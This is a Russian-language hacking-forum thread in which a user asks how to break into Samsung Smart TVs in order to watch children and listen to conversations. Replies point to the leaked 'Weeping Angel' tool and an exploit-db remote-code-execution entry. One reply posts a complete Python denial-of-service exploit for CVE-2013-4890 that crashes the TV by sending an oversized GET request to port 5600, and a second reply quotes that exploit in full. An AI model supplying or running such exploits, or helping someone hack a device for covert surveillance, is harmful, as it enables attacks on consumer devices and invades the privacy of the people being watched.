• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Действительно ли возможен взлом телевизоров samsung smart tv

thunder

Green Team
08.12.2016
219
26
BIT
0
Возможен ли взлом телевизоров samsung smart tv ( с целью видеонаблюдения за детьми , прослушка разговора ) ? Какие инструменты актуальны для этой цели ?
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
статья про смарт тв от 15 года, там по ссылкам можно наковырять и за 14-13 год.

 

thunder

Green Team
08.12.2016
219
26
BIT
0
ghostphisher : Статья это хорошо :) Вот только я не увидел никакой конкретики ( гайд взлома , инструменты ).
 

Axon

Green Team
04.01.2017
70
77
BIT
0
На днях, на wikileaks как раз была опубликована коллекция инструментов для взлома, которые принадлежали ЦРУ, в том числе там есть и упоминание о эксплойте для тех самых телевизоров Samsung, эксплойт называется weeping angel.
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
На эксплоит дб лежат с 15 года
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
[doublepost=1489179831,1489125160][/doublepost]

Под спойлер спрятал код для DoS ящиков Самсы

#!/usr/bin/python
#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT -
# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:
# P.O.C =>
#
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
#
###



# ----------------------------
# import dependencies
# ----------------------------
import httplib
import time
import sys
import os
import time



# ----------------------------
# script colorize output
# ----------------------------
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
WHITE = '\033[0m'
ORANGE = '\033[33m'



# ----------------------------
# exploit banner
# ----------------------------
print BLUE+"**************************************************************"
print WHITE+" Author: Malik Mesellem - @MME_IT - "
print WHITE+" Exploit: Denial of Service (DoS) attack"
print WHITE+" module by: pedr0 ubuntu aka r00t-3xp10it"
print ""
print WHITE+" Description:"
print WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600"
print WHITE+" is crashing by sending a long HTTP GET request."
print WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)"
print BLUE+"**************************************************************"




# ----------------------------
# Sends the payload
# ----------------------------
print ""
print BLUE+"[*]"+GREEN+" press ctrl+z to stop"
print BLUE+"[*]"+WHITE+" Sending the malicious payload..."
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# ----------------------------
# Checks the response
# ----------------------------
print BLUE+"[*]"+WHITE+" Checking the status..."
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print BLUE+"[*]"+GREEN+" (Success):"+RED+" the target seems to be down !!!"
print WHITE+""
time.sleep(10)
 

thunder

Green Team
08.12.2016
219
26
BIT
0
На эксплоит дб лежат с 15 года
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
[doublepost=1489179831,1489125160][/doublepost]

Под спойлер спрятал код для DoS ящиков Самсы

#!/usr/bin/python
#
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT -
# module by: pedr0 ubuntu [ r00t-3xp10it ]
#
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage:
# P.O.C =>
#
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long
# HTTP GET request As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
#
###



# ----------------------------
# import dependencies
# ----------------------------
import httplib
import time
import sys
import os
import time



# ----------------------------
# script colorize output
# ----------------------------
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
WHITE = '\033[0m'
ORANGE = '\033[33m'



# ----------------------------
# exploit banner
# ----------------------------
print BLUE+"**************************************************************"
print WHITE+" Author: Malik Mesellem - @MME_IT - "
print WHITE+" Exploit: Denial of Service (DoS) attack"
print WHITE+" module by: pedr0 ubuntu aka r00t-3xp10it"
print ""
print WHITE+" Description:"
print WHITE+" The web server (DMCRUIS/0.1) on port TCP/5600"
print WHITE+" is crashing by sending a long HTTP GET request."
print WHITE+" Tested successfully on my Samsung PS50C7700 plasma TV :)"
print BLUE+"**************************************************************"




# ----------------------------
# Sends the payload
# ----------------------------
print ""
print BLUE+""+GREEN+" press ctrl+z to stop"
print BLUE+""+WHITE+" Sending the malicious payload..."
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# ----------------------------
# Checks the response
# ----------------------------
print BLUE+""+WHITE+" Checking the status..."
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print BLUE+""+GREEN+" (Success):"+RED+" the target seems to be down !!!"
print WHITE+""
time.sleep(10)
Спасибо за конкретику . Как фремворк поддерживает данный эксплоит (в какой фремворк его можно засунуть ) ? Там ,что то написано про поддержку windows 7 ..
[doublepost=1489198730][/doublepost]
На днях, на wikileaks как раз была опубликована коллекция инструментов для взлома, которые принадлежали ЦРУ, в том числе там есть и упоминание о эксплойте для тех самых телевизоров Samsung, эксплойт называется weeping angel.
Документы по weeping angel нашёл , а вот само по пока нет. По мимо документов , программы сливались ?
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Инструменты на паблик еще не скоро попадут. Хотя про сливы оных я не увидел новостей. И просить тут тоже не стоит.
 

thunder

Green Team
08.12.2016
219
26
BIT
0
ghostphisher: А, что по поводу эксплоита Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution..как его реализовать - в какой фрейморк его можно установить ?
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
[ А, что по поводу эксплоита Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution..как его реализовать - в какой фрейморк его можно установить ?

Там же в шапке кода написано на чем код, соотвественно его надо запускать на этом же. Зачем фрейм, если он так работать может..?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!